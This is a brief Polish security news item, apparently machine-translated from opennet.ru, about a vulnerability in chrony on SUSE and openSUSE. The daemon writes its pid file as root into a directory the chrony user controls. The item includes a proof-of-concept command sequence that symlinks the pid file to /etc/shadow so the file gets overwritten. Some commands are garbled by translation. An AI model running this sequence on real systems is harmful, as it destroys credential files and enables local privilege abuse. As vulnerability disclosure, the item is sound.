В
Luka wynika z niebezpiecznego utworzenia pliku pid, który powstał na etapie, gdy chrony nie miał jeszcze zresetowanych uprawnień i działał jako root. W tym przypadku katalog /run/chrony, w którym zapisywany jest plik pid, został utworzony z uprawnieniami 0750 poprzez systemd-tmpfiles lub podczas uruchamiania chronyd w powiązaniu z użytkownikiem i grupą „chrony”. Zatem jeśli masz dostęp do chrony użytkownika, możliwe jest zastąpienie pliku pid /run/chrony/chronyd.pid dowiązaniem symbolicznym. Dowiązanie symboliczne może wskazywać dowolny plik systemowy, który zostanie nadpisany po uruchomieniu chronyd.
root# systemctl zatrzymaj chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
wyjście z chrony$
root# /usr/sbin/chronyd -n
^C
# zamiast zawartości /etc/shadow zostanie zapisany identyfikator procesu chronyd
root # kot /etc/shadow
15287
Słaby punkt
Problem z SUSE i openSUSE
Źródło: opennet.ru